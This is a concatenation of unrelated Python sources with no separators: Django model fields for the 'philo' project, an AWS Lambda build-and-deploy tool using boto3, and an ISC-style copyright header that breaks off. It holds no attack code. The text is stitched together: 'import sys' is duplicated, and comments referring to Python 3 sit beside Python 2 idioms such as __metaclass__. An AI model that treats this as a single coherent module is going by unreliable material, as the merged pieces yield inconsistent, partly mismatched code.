import itertools

from django import forms
from django.core.exceptions import ValidationError
from django.core.validators import validate_slug
from django.db import models
from django.utils import simplejson as json
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _

from philo.forms.fields import JSONFormField
from philo.utils.registry import RegistryIterator
from philo.validators import TemplateValidator, json_validator
#from philo.models.fields.entities import *


class TemplateField(models.TextField):
	"""A :class:`TextField` which is validated with a :class:`.TemplateValidator`. ``allow``, ``disallow``, and ``secure`` will be passed into the validator's construction."""
	def __init__(self, allow=None, disallow=None, secure=True, *args, **kwargs):
		# Build the validator up front, then attach it after the normal
		# TextField initialization has populated self.validators.
		template_validator = TemplateValidator(allow, disallow, secure)
		super(TemplateField, self).__init__(*args, **kwargs)
		self.validators.append(template_validator)


class JSONDescriptor(object):
	"""Descriptor that exposes a python object on the model instance while
	keeping the serialized JSON string in sync under the field's attname."""
	def __init__(self, field):
		self.field = field
	
	def __get__(self, instance, owner):
		if instance is None:
			# Class-level access has no per-instance value.
			raise AttributeError
		
		field_name = self.field.name
		try:
			return instance.__dict__[field_name]
		except KeyError:
			# Lazily decode the stored JSON string on first access.
			raw = getattr(instance, self.field.attname)
			decoded = json.loads(raw)
			instance.__dict__[field_name] = decoded
			return decoded
	
	def __set__(self, instance, value):
		# Keep the python object and its JSON serialization in lockstep.
		instance.__dict__[self.field.name] = value
		setattr(instance, self.field.attname, json.dumps(value))
	
	def __delete__(self, instance):
		# Raises KeyError (like `del`) if the cached value is absent.
		instance.__dict__.pop(self.field.name)
		setattr(instance, self.field.attname, json.dumps(None))


class JSONField(models.TextField):
	"""A :class:`TextField` which stores its value on the model instance as a python object and stores its value in the database as JSON. Validated with :func:`.json_validator`."""
	default_validators = [json_validator]
	
	def get_attname(self):
		# The raw JSON string lives under "<name>_json"; the decoded object
		# is served by the JSONDescriptor installed under "<name>".
		return "%s_json" % self.name
	
	def contribute_to_class(self, cls, name):
		super(JSONField, self).contribute_to_class(cls, name)
		setattr(cls, name, JSONDescriptor(self))
		models.signals.pre_init.connect(self.fix_init_kwarg, sender=cls)
	
	def fix_init_kwarg(self, sender, args, kwargs, **signal_kwargs):
		# Anything passed in as self.name is assumed to come from a serializer and
		# will be treated as a json string.
		if self.name not in kwargs:
			return
		value = kwargs.pop(self.name)
		# Hack to handle the xml serializer's handling of "null"
		if value is None:
			value = 'null'
		kwargs[self.attname] = value
	
	def formfield(self, *args, **kwargs):
		# Always use the JSON-aware form field, overriding any caller choice.
		kwargs.update(form_class=JSONFormField)
		return super(JSONField, self).formfield(*args, **kwargs)


class SlugMultipleChoiceField(models.Field):
	"""Stores a selection of multiple items with unique slugs in the form of a comma-separated list. Also knows how to correctly handle :class:`RegistryIterator`\ s passed in as choices."""
	__metaclass__ = models.SubfieldBase
	description = _("Comma-separated slug field")
	
	def get_internal_type(self):
		# Stored as a plain TEXT column in the database.
		return "TextField"
	
	def to_python(self, value):
		"""Convert the stored comma-separated string (or an already-converted list) into a list of slugs."""
		if not value:
			return []
		
		if isinstance(value, list):
			return value
		
		return value.split(',')
	
	def get_prep_value(self, value):
		"""Serialize the list of slugs back into a comma-separated string for storage."""
		return ','.join(value)
	
	def formfield(self, **kwargs):
		# This is necessary because django hard-codes TypedChoiceField for things with choices.
		defaults = {
			'widget': forms.CheckboxSelectMultiple,
			'choices': self.get_choices(include_blank=False),
			'label': capfirst(self.verbose_name),
			'required': not self.blank,
			'help_text': self.help_text
		}
		if self.has_default():
			if callable(self.default):
				defaults['initial'] = self.default
				defaults['show_hidden_initial'] = True
			else:
				defaults['initial'] = self.get_default()
		
		# Iterate over a snapshot of the keys: deleting entries while
		# iterating the live keys view raises RuntimeError on python 3.
		for k in list(kwargs):
			if k not in ('coerce', 'empty_value', 'choices', 'required',
						 'widget', 'label', 'initial', 'help_text',
						 'error_messages', 'show_hidden_initial'):
				del kwargs[k]
		
		defaults.update(kwargs)
		form_class = forms.TypedMultipleChoiceField
		return form_class(**defaults)
	
	def validate(self, value, model_instance):
		"""Raise a :exc:`ValidationError` if any entry in ``value`` is not a valid slug."""
		invalid_values = []
		for val in value:
			try:
				validate_slug(val)
			except ValidationError:
				invalid_values.append(val)
		
		if invalid_values:
			# should really make a custom message.
			raise ValidationError(self.error_messages['invalid_choice'] % invalid_values)
	
	def _get_choices(self):
		"""Return the choices without exhausting one-shot iterators: RegistryIterators are copied and plain iterators are tee'd."""
		if isinstance(self._choices, RegistryIterator):
			return self._choices.copy()
		elif hasattr(self._choices, 'next'):
			# Requires the module-level ``import itertools``; the original
			# code referenced itertools without importing it (NameError).
			choices, self._choices = itertools.tee(self._choices)
			return choices
		else:
			return self._choices
	choices = property(_get_choices)


# Register these custom fields with south (if installed) so schema
# migrations can introspect them; they need no extra rules.
try:
	from south.modelsinspector import add_introspection_rules
except ImportError:
	pass
else:
	# Raw strings: the originals relied on "\." being passed through
	# unrecognized, which is an invalid escape sequence on modern python.
	add_introspection_rules([], [r"^philo\.models\.fields\.SlugMultipleChoiceField"])
	add_introspection_rules([], [r"^philo\.models\.fields\.TemplateField"])
	add_introspection_rules([], [r"^philo\.models\.fields\.JSONField"])
import hashlib
import json
import logging
import os
import subprocess
import sys
import time
from collections import defaultdict

from shutil import copy
from shutil import copyfile
from shutil import copystat
from shutil import copytree
from tempfile import mkdtemp

import boto3
import botocore
import yaml
import sys

from .helpers import archive
from .helpers import get_environment_variable_value
from .helpers import LambdaContext
from .helpers import mkdir
from .helpers import read
from .helpers import timestamp


# Partition prefixes for regions whose ARNs are not in the default "aws"
# partition (China and GovCloud); see get_role_name below.
ARN_PREFIXES = {
    "cn-north-1": "aws-cn",
    "cn-northwest-1": "aws-cn",
    "us-gov-west-1": "aws-us-gov",
}

# Module-level logger.
log = logging.getLogger(__name__)


def load_source(module_name, module_path):
    """Loads a python module from the path of the corresponding file.

    :param str module_name:
        Name to register the module under.
    :param str module_path:
        Filesystem path of the ``.py`` file to load.
    :return: The loaded module object.
    """
    # Tuple comparison covers all interpreters >= 3.5; the original compared
    # version_info[0]/[1] separately, which left `module` unbound (and raised
    # UnboundLocalError) on any interpreter matching neither branch.
    if sys.version_info >= (3, 5):
        import importlib.util
        spec = importlib.util.spec_from_file_location(module_name, module_path)
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
    else:
        # Legacy loader API for interpreters older than 3.5.
        import importlib.machinery
        loader = importlib.machinery.SourceFileLoader(module_name, module_path)
        module = loader.load_module()
    return module


def cleanup_old_versions(
    src, keep_last_versions, config_file="config.yaml", profile_name=None,
):
    """Deletes old deployed versions of the function in AWS Lambda.

    Won't delete $Latest and any aliased version

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param int keep_last_versions:
        The number of recent versions to keep and not delete
    :param str config_file:
        Name of the config file inside ``src`` (default: config.yaml).
    :param str profile_name:
        Optional AWS profile name overriding the one in the config file.
    """
    if keep_last_versions <= 0:
        print("Won't delete all versions. Please do this manually")
    else:
        path_to_config_file = os.path.join(src, config_file)
        cfg = read_cfg(path_to_config_file, profile_name)

        profile_name = cfg.get("profile")
        aws_access_key_id = cfg.get("aws_access_key_id")
        aws_secret_access_key = cfg.get("aws_secret_access_key")

        client = get_client(
            "lambda",
            profile_name,
            aws_access_key_id,
            aws_secret_access_key,
            cfg.get("region"),
        )

        # NOTE(review): list_versions_by_function is paginated; only the
        # first page is inspected here -- confirm whether that matters for
        # functions with many versions.
        response = client.list_versions_by_function(
            FunctionName=cfg.get("function_name"),
        )
        versions = response.get("Versions")
        if len(response.get("Versions")) < keep_last_versions:
            print("Nothing to delete. (Too few versions published)")
        else:
            # Skip index 0 (presumably $LATEST -- see docstring) and keep the
            # newest `keep_last_versions` entries at the tail of the list.
            version_numbers = [
                elem.get("Version") for elem in versions[1:-keep_last_versions]
            ]
            for version_number in version_numbers:
                try:
                    client.delete_function(
                        FunctionName=cfg.get("function_name"),
                        Qualifier=version_number,
                    )
                except botocore.exceptions.ClientError as e:
                    # Per the docstring, aliased versions are not deleted;
                    # report the failure and continue with the rest.
                    print(f"Skipping Version {version_number}: {e}")


def deploy(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
    preserve_vpc=False,
):
    """Deploys a new function to AWS Lambda.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str requirements:
        Optional path to a requirements file restricting what gets bundled.
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    :param str config_file:
        Name of the config file inside ``src`` (default: config.yaml).
    :param str profile_name:
        Optional AWS profile name overriding the one in the config file.
    :param bool preserve_vpc:
        When updating an existing function, keep its current VPC settings.
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Copy all the pip dependencies required to run your code into a temporary
    # folder then add the handler file in the root of this directory.
    # Zip the contents of this folder into a single file and output to the dist
    # directory.
    path_to_zip_file = build(
        src,
        config_file=config_file,
        requirements=requirements,
        local_package=local_package,
    )

    # Create the function if it doesn't exist yet; otherwise update in place.
    existing_config = get_function_config(cfg)
    if existing_config:
        update_function(
            cfg, path_to_zip_file, existing_config, preserve_vpc=preserve_vpc
        )
    else:
        create_function(cfg, path_to_zip_file)


def deploy_s3(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
    preserve_vpc=False,
):
    """Deploys a new function via AWS S3.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str requirements:
        Optional path to a requirements file restricting what gets bundled.
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    :param str config_file:
        Name of the config file inside ``src`` (default: config.yaml).
    :param str profile_name:
        Optional AWS profile name overriding the one in the config file.
    :param bool preserve_vpc:
        When updating an existing function, keep its current VPC settings.
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Copy all the pip dependencies required to run your code into a temporary
    # folder then add the handler file in the root of this directory.
    # Zip the contents of this folder into a single file and output to the dist
    # directory.
    path_to_zip_file = build(
        src,
        config_file=config_file,
        requirements=requirements,
        local_package=local_package,
    )

    # Upload the package to S3 first, then point the Lambda function at the
    # uploaded object rather than sending the zip bytes inline.
    use_s3 = True
    s3_file = upload_s3(cfg, path_to_zip_file, use_s3)
    existing_config = get_function_config(cfg)
    if existing_config:
        update_function(
            cfg,
            path_to_zip_file,
            existing_config,
            use_s3=use_s3,
            s3_file=s3_file,
            preserve_vpc=preserve_vpc,
        )
    else:
        create_function(cfg, path_to_zip_file, use_s3=use_s3, s3_file=s3_file)


def upload(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
):
    """Uploads a new function to AWS S3.

    Builds the deployment package and uploads it to the configured S3
    bucket without touching the Lambda function itself.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str requirements:
        Optional path to a requirements file restricting what gets bundled.
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    :param str config_file:
        Name of the config file inside ``src`` (default: config.yaml).
    :param str profile_name:
        Optional AWS profile name overriding the one in the config file.
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Copy all the pip dependencies required to run your code into a temporary
    # folder then add the handler file in the root of this directory.
    # Zip the contents of this folder into a single file and output to the dist
    # directory.
    path_to_zip_file = build(
        src,
        config_file=config_file,
        requirements=requirements,
        local_package=local_package,
    )

    upload_s3(cfg, path_to_zip_file)


def invoke(
    src,
    event_file="event.json",
    config_file="config.yaml",
    profile_name=None,
    verbose=False,
):
    """Simulates a call to your function.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str event_file:
        An optional argument to override which event file to use.
    :param str config_file:
        Name of the config file inside ``src`` (default: config.yaml).
    :param str profile_name:
        Optional AWS profile name overriding the one in the config file.
    :param bool verbose:
        Whether to print out verbose details.
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Set AWS_PROFILE environment variable based on `--profile` option.
    if profile_name:
        os.environ["AWS_PROFILE"] = profile_name

    # Load environment variables from the config file into the actual
    # environment.
    env_vars = cfg.get("environment_variables")
    if env_vars:
        for key, value in env_vars.items():
            os.environ[key] = get_environment_variable_value(value)

    # Load and parse event file.
    path_to_event_file = os.path.join(src, event_file)
    event = read(path_to_event_file, loader=json.loads)

    # Tweak to allow module to import local modules
    try:
        sys.path.index(src)
    except ValueError:
        sys.path.append(src)

    handler = cfg.get("handler")
    # Inspect the handler string (<module>.<function name>) and translate it
    # into a function we can execute.
    fn = get_callable_handler_function(src, handler)

    # Build a fake Lambda context, honouring the configured timeout if any.
    timeout = cfg.get("timeout")
    if timeout:
        context = LambdaContext(cfg.get("function_name"), timeout)
    else:
        context = LambdaContext(cfg.get("function_name"))

    # Time the handler call so verbose mode can report execution time.
    start = time.time()
    results = fn(event, context)
    end = time.time()

    print("{0}".format(results))
    if verbose:
        print(
            "\nexecution time: {:.8f}s\nfunction execution "
            "timeout: {:2}s".format(end - start, cfg.get("timeout", 15))
        )


def init(src, minimal=False):
    """Copies template files to a given directory.

    :param str src:
        The path to output the template lambda project files.
    :param bool minimal:
        Minimal possible template files (excludes event.json).
    """
    templates_path = os.path.join(
        os.path.dirname(os.path.abspath(__file__)), "project_templates",
    )
    for template_name in os.listdir(templates_path):
        # Skip the sample event in minimal mode and compiled artifacts always.
        if minimal and template_name == "event.json":
            continue
        if template_name.endswith(".pyc"):
            continue
        template_path = os.path.join(templates_path, template_name)
        # Only copy plain files; nested directories are left alone.
        if os.path.isdir(template_path):
            continue
        copy(template_path, src)


def build(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
):
    """Builds the file bundle.

    :param str src:
       The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str requirements:
        Optional path to a requirements file restricting what gets bundled.
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    :param str config_file:
        Name of the config file inside ``src`` (default: config.yaml).
    :param str profile_name:
        Optional AWS profile name overriding the one in the config file.
    :return: Path to the zip archive that was created.
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Get the absolute path to the output directory and create it if it doesn't
    # already exist.
    dist_directory = cfg.get("dist_directory", "dist")
    path_to_dist = os.path.join(src, dist_directory)
    mkdir(path_to_dist)

    # Combine the name of the Lambda function with the current timestamp to use
    # for the output filename.
    function_name = cfg.get("function_name")
    output_filename = "{0}-{1}.zip".format(timestamp(), function_name)

    path_to_temp = mkdtemp(prefix="aws-lambda")
    pip_install_to_target(
        path_to_temp, requirements=requirements, local_package=local_package,
    )

    # Hack for Zope.
    if "zope" in os.listdir(path_to_temp):
        print(
            "Zope packages detected; fixing Zope package paths to "
            "make them importable.",
        )
        # Touch.
        with open(os.path.join(path_to_temp, "zope/__init__.py"), "wb"):
            pass

    # Gracefully handle whether ".zip" was included in the filename or not.
    output_filename = (
        "{0}.zip".format(output_filename)
        if not output_filename.endswith(".zip")
        else output_filename
    )

    # Allow definition of source code directories we want to build into our
    # zipped package.
    build_config = defaultdict(**cfg.get("build", {}))
    build_source_directories = build_config.get("source_directories", "")
    build_source_directories = (
        build_source_directories
        if build_source_directories is not None
        else ""
    )
    source_directories = [
        d.strip() for d in build_source_directories.split(",")
    ]

    files = []
    for filename in os.listdir(src):
        # Bug fix: resolve each entry against `src`. The bare name was
        # previously tested against the current working directory, so nothing
        # was bundled unless the tool happened to run from inside `src`.
        path = os.path.join(src, filename)
        if os.path.isfile(path):
            if filename == ".DS_Store":
                continue
            if filename == config_file:
                continue
            print("Bundling: %r" % filename)
            files.append(path)
        elif os.path.isdir(path) and filename in source_directories:
            print("Bundling directory: %r" % filename)
            files.append(path)

    # "cd" into `temp_path` directory.
    os.chdir(path_to_temp)
    for f in files:
        if os.path.isfile(f):
            _, filename = os.path.split(f)

            # Copy handler file into root of the packages folder.
            copyfile(f, os.path.join(path_to_temp, filename))
            copystat(f, os.path.join(path_to_temp, filename))
        elif os.path.isdir(f):
            # Recreate the directory relative to the temp root.
            src_path_length = len(src) + 1
            destination_folder = os.path.join(
                path_to_temp, f[src_path_length:]
            )
            copytree(f, destination_folder)

    # Zip them together into a single file.
    # TODO: Delete temp directory created once the archive has been compiled.
    path_to_zip_file = archive("./", path_to_dist, output_filename)
    return path_to_zip_file


def get_callable_handler_function(src, handler):
    """Translate a string of the form "module.function" into a callable
    function.

    :param str src:
      The path to your Lambda project containing a valid handler file.
    :param str handler:
      A dot delimited string representing the `<module>.<function name>`.
    """
    # "cd" into the project so relative resources resolve against it.
    os.chdir(src)

    module_name, function_name = handler.split(".")
    path_to_module_file = os.path.join(src, get_handler_filename(handler))
    module = load_source(module_name, path_to_module_file)
    return getattr(module, function_name)


def get_handler_filename(handler):
    """Shortcut to get the filename from the handler string.

    :param str handler:
      A dot delimited string representing the `<module>.<function name>`.
    """
    # Exactly one dot is expected; anything else raises ValueError.
    module_name, _function = handler.split(".")
    return module_name + ".py"


def _install_packages(path, packages):
    """Install all packages listed to the target directory.

    Ignores any package that includes Python itself and python-lambda as well
    since its only needed for deploying and not running the code

    :param str path:
        Path to copy installed pip packages to.
    :param list packages:
        A list of packages to be installed via pip.
    """
    # Drop index options, comments, and the runtime itself.
    skip_prefixes = ("-i", "#", "Python==", "python-lambda==")

    def _filter_blacklist(package):
        return not package.startswith(skip_prefixes)

    for package in filter(_filter_blacklist, packages):
        # Strip pip's editable-install marker before passing to `pip install`.
        if package.startswith("-e "):
            package = package.replace("-e ", "")

        print("Installing {package}".format(package=package))
        pip_command = [
            sys.executable,
            "-m",
            "pip",
            "install",
            package,
            "-t",
            path,
            "--ignore-installed",
        ]
        subprocess.check_call(pip_command)
    print(
        "Install directory contents are now: {directory}".format(
            directory=os.listdir(path)
        )
    )


def pip_install_to_target(path, requirements=None, local_package=None):
    """For a given active virtualenv, gather all installed pip packages then
    copy (re-install) them to the path provided.

    :param str path:
        Path to copy installed pip packages to.
    :param str requirements:
        If set, only the packages in the supplied requirements file are
        installed.
        If not set then installs all packages found via pip freeze.
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    """
    packages = []
    if requirements:
        # A silently-missing requirements file yields an empty package list,
        # matching the original behavior.
        if os.path.exists(requirements):
            print("Gathering requirement packages")
            packages.extend(read(requirements).splitlines())
    else:
        print("Gathering pip packages")
        frozen = subprocess.check_output(
            [sys.executable, "-m", "pip", "freeze"]
        )
        packages.extend(frozen.decode("utf-8").splitlines())

    if not packages:
        print("No dependency packages installed!")

    if local_package is not None:
        # Accept a single path or a list/tuple of paths.
        if isinstance(local_package, (list, tuple)):
            packages.extend(local_package)
        else:
            packages.append(local_package)
    _install_packages(path, packages)


def get_role_name(region, account_id, role):
    """Shortcut to insert the `account_id` and `role` into the iam string."""
    # Non-default partitions (China, GovCloud) come from ARN_PREFIXES.
    partition = ARN_PREFIXES.get(region, "aws")
    return "arn:{0}:iam::{1}:role/{2}".format(partition, account_id, role)


def get_account_id(
    profile_name, aws_access_key_id, aws_secret_access_key, region=None,
):
    """Query STS for a users' account_id"""
    sts = get_client(
        "sts", profile_name, aws_access_key_id, aws_secret_access_key, region,
    )
    identity = sts.get_caller_identity()
    return identity.get("Account")


def get_client(
    client,
    profile_name,
    aws_access_key_id,
    aws_secret_access_key,
    region=None,
):
    """Shortcut for getting an initialized instance of the boto3 client."""
    # Configure the default session first so the client inherits the
    # credentials, profile, and region in one place.
    session_options = {
        "profile_name": profile_name,
        "aws_access_key_id": aws_access_key_id,
        "aws_secret_access_key": aws_secret_access_key,
        "region_name": region,
    }
    boto3.setup_default_session(**session_options)
    return boto3.client(client)


def create_function(cfg, path_to_zip_file, use_s3=False, s3_file=None):
    """Register and upload a function to AWS Lambda.

    :param dict cfg:
        Parsed configuration (see config.yaml).
    :param str path_to_zip_file:
        Path to the built deployment package.
    :param bool use_s3:
        When True, reference the package already uploaded to S3 instead of
        sending the zip bytes inline.
    :param str s3_file:
        S3 key of the uploaded package (only used when ``use_s3`` is True).
    """

    print("Creating your new Lambda function")
    # The zip bytes are read unconditionally, even when use_s3 is True.
    byte_stream = read(path_to_zip_file, binary_file=True)
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")

    # Resolve the full IAM role ARN from the account id and configured role.
    account_id = get_account_id(
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region",),
    )
    role = get_role_name(
        cfg.get("region"),
        account_id,
        cfg.get("role", "lambda_basic_execution"),
    )

    client = get_client(
        "lambda",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )

    # Do we prefer development variable over config?
    buck_name = os.environ.get("S3_BUCKET_NAME") or cfg.get("bucket_name")
    func_name = os.environ.get("LAMBDA_FUNCTION_NAME") or cfg.get(
        "function_name"
    )
    print("Creating lambda function with name: {}".format(func_name))

    # The two variants differ only in how the code is supplied: an S3
    # bucket/key reference versus the raw zip bytes.
    if use_s3:
        kwargs = {
            "FunctionName": func_name,
            "Runtime": cfg.get("runtime", "python2.7"),
            "Role": role,
            "Handler": cfg.get("handler"),
            "Code": {
                "S3Bucket": "{}".format(buck_name),
                "S3Key": "{}".format(s3_file),
            },
            "Description": cfg.get("description", ""),
            "Timeout": cfg.get("timeout", 15),
            "MemorySize": cfg.get("memory_size", 512),
            "VpcConfig": {
                "SubnetIds": cfg.get("subnet_ids", []),
                "SecurityGroupIds": cfg.get("security_group_ids", []),
            },
            "Publish": True,
        }
    else:
        kwargs = {
            "FunctionName": func_name,
            "Runtime": cfg.get("runtime", "python2.7"),
            "Role": role,
            "Handler": cfg.get("handler"),
            "Code": {"ZipFile": byte_stream},
            "Description": cfg.get("description", ""),
            "Timeout": cfg.get("timeout", 15),
            "MemorySize": cfg.get("memory_size", 512),
            "VpcConfig": {
                "SubnetIds": cfg.get("subnet_ids", []),
                "SecurityGroupIds": cfg.get("security_group_ids", []),
            },
            "Publish": True,
        }

    # Optional resource tags; values are coerced to strings for the API.
    if "tags" in cfg:
        kwargs.update(
            Tags={key: str(value) for key, value in cfg.get("tags").items()}
        )

    # Optional environment variables, resolved through the helper so values
    # may reference the local environment.
    if "environment_variables" in cfg:
        kwargs.update(
            Environment={
                "Variables": {
                    key: get_environment_variable_value(value)
                    for key, value in cfg.get("environment_variables").items()
                },
            },
        )

    client.create_function(**kwargs)

    # Apply reserved concurrency only when a positive value is configured.
    concurrency = get_concurrency(cfg)
    if concurrency > 0:
        client.put_function_concurrency(
            FunctionName=func_name, ReservedConcurrentExecutions=concurrency
        )


def update_function(
    cfg,
    path_to_zip_file,
    existing_cfg,
    use_s3=False,
    s3_file=None,
    preserve_vpc=False,
):
    """Updates the code of an existing Lambda function

    :param dict cfg:
        Parsed configuration (see config.yaml).
    :param str path_to_zip_file:
        Path to the built deployment package.
    :param dict existing_cfg:
        The existing function description as returned by get_function_config.
    :param bool use_s3:
        When True, reference the package already uploaded to S3 instead of
        sending the zip bytes inline.
    :param str s3_file:
        S3 key of the uploaded package (only used when ``use_s3`` is True).
    :param bool preserve_vpc:
        Keep the function's current VPC settings rather than applying the
        ones from the config file.
    """

    print("Updating your Lambda function")
    # The zip bytes are read unconditionally, even when use_s3 is True.
    byte_stream = read(path_to_zip_file, binary_file=True)
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")

    # Resolve the full IAM role ARN from the account id and configured role.
    account_id = get_account_id(
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region",),
    )
    role = get_role_name(
        cfg.get("region"),
        account_id,
        cfg.get("role", "lambda_basic_execution"),
    )

    client = get_client(
        "lambda",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )

    # Do we prefer development variable over config?
    buck_name = os.environ.get("S3_BUCKET_NAME") or cfg.get("bucket_name")

    # Push the new code first; configuration is updated separately below.
    if use_s3:
        client.update_function_code(
            FunctionName=cfg.get("function_name"),
            S3Bucket="{}".format(buck_name),
            S3Key="{}".format(s3_file),
            Publish=True,
        )
    else:
        client.update_function_code(
            FunctionName=cfg.get("function_name"),
            ZipFile=byte_stream,
            Publish=True,
        )

    kwargs = {
        "FunctionName": cfg.get("function_name"),
        "Role": role,
        "Runtime": cfg.get("runtime"),
        "Handler": cfg.get("handler"),
        "Description": cfg.get("description", ""),
        "Timeout": cfg.get("timeout", 15),
        "MemorySize": cfg.get("memory_size", 512),
    }

    if preserve_vpc:
        # Reuse the function's current VPC settings; fall back to the config
        # values when the existing description carries none.
        kwargs["VpcConfig"] = existing_cfg.get("Configuration", {}).get(
            "VpcConfig"
        )
        if kwargs["VpcConfig"] is None:
            kwargs["VpcConfig"] = {
                "SubnetIds": cfg.get("subnet_ids", []),
                "SecurityGroupIds": cfg.get("security_group_ids", []),
            }
        else:
            # The get_function response includes VpcId, which
            # update_function_configuration does not accept as input.
            del kwargs["VpcConfig"]["VpcId"]
    else:
        kwargs["VpcConfig"] = {
            "SubnetIds": cfg.get("subnet_ids", []),
            "SecurityGroupIds": cfg.get("security_group_ids", []),
        }

    # Optional environment variables; values are coerced to strings after
    # resolution (unlike create_function, which passes them through as-is).
    if "environment_variables" in cfg:
        kwargs.update(
            Environment={
                "Variables": {
                    key: str(get_environment_variable_value(value))
                    for key, value in cfg.get("environment_variables").items()
                },
            },
        )

    ret = client.update_function_configuration(**kwargs)

    # Sync reserved concurrency: set it when configured positive, otherwise
    # remove any reservation the function previously had.
    concurrency = get_concurrency(cfg)
    if concurrency > 0:
        client.put_function_concurrency(
            FunctionName=cfg.get("function_name"),
            ReservedConcurrentExecutions=concurrency,
        )
    elif "Concurrency" in existing_cfg:
        client.delete_function_concurrency(
            FunctionName=cfg.get("function_name")
        )

    # Sync tags: only touch the API when the desired tags differ, clearing
    # the old set before applying the new one.
    if "tags" in cfg:
        tags = {key: str(value) for key, value in cfg.get("tags").items()}
        if tags != existing_cfg.get("Tags"):
            if existing_cfg.get("Tags"):
                client.untag_resource(
                    Resource=ret["FunctionArn"],
                    TagKeys=list(existing_cfg["Tags"].keys()),
                )
            client.tag_resource(Resource=ret["FunctionArn"], Tags=tags)


def upload_s3(cfg, path_to_zip_file, *use_s3):
    """Upload a function to AWS S3.

    :param dict cfg:
        Parsed configuration (see config.yaml).
    :param str path_to_zip_file:
        Path to the built deployment package.
    :param use_s3:
        Varargs flag: when any extra positional argument is passed (and the
        resulting tuple is truthy), the generated S3 key is returned;
        otherwise the function returns None.
    """

    print("Uploading your new Lambda function")
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")
    client = get_client(
        "s3",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )
    byte_stream = b""
    with open(path_to_zip_file, mode="rb") as fh:
        byte_stream = fh.read()
    s3_key_prefix = cfg.get("s3_key_prefix", "/dist")
    checksum = hashlib.new("md5", byte_stream).hexdigest()
    # NOTE(review): this local `timestamp` shadows the imported helpers
    # `timestamp` function within this scope.
    timestamp = str(time.time())
    # Key is prefix + md5 + upload time, so repeated uploads never collide.
    filename = "{prefix}{checksum}-{ts}.zip".format(
        prefix=s3_key_prefix, checksum=checksum, ts=timestamp,
    )

    # Do we prefer development variable over config?
    buck_name = os.environ.get("S3_BUCKET_NAME") or cfg.get("bucket_name")
    func_name = os.environ.get("LAMBDA_FUNCTION_NAME") or cfg.get(
        "function_name"
    )
    kwargs = {
        "Bucket": "{}".format(buck_name),
        "Key": "{}".format(filename),
        "Body": byte_stream,
    }

    client.put_object(**kwargs)
    print("Finished uploading {} to S3 bucket {}".format(func_name, buck_name))
    if use_s3:
        return filename


def get_function_config(cfg):
    """Check whether a function exists or not and return its config.

    Returns the ``get_function`` response dict when the function exists, and
    ``False`` when Lambda reports it as not found. Note: if the
    ResourceNotFoundException message does not contain "Function not found",
    the function implicitly returns None (also falsy).
    """

    function_name = cfg.get("function_name")
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")
    client = get_client(
        "lambda",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )

    try:
        return client.get_function(FunctionName=function_name)
    except client.exceptions.ResourceNotFoundException as e:
        if "Function not found" in str(e):
            return False


def get_concurrency(cfg):
    """Return the Reserved Concurrent Executions if present in the config"""
    # Missing or negative values collapse to 0 (meaning: no reservation).
    return max(0, int(cfg.get("concurrency", 0)))


def read_cfg(path_to_config_file, profile_name):
    """Load the YAML config file.

    The AWS profile is overridden by the explicit argument when given,
    otherwise by the AWS_PROFILE environment variable when set.
    """
    config = read(path_to_config_file, loader=yaml.full_load)
    if profile_name is not None:
        config["profile"] = profile_name
    elif "AWS_PROFILE" in os.environ:
        config["profile"] = os.environ["AWS_PROFILE"]
    return config

# Copyright (c) 2015, Max Fillinger <max@max-fillinger.net>
# 
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# 
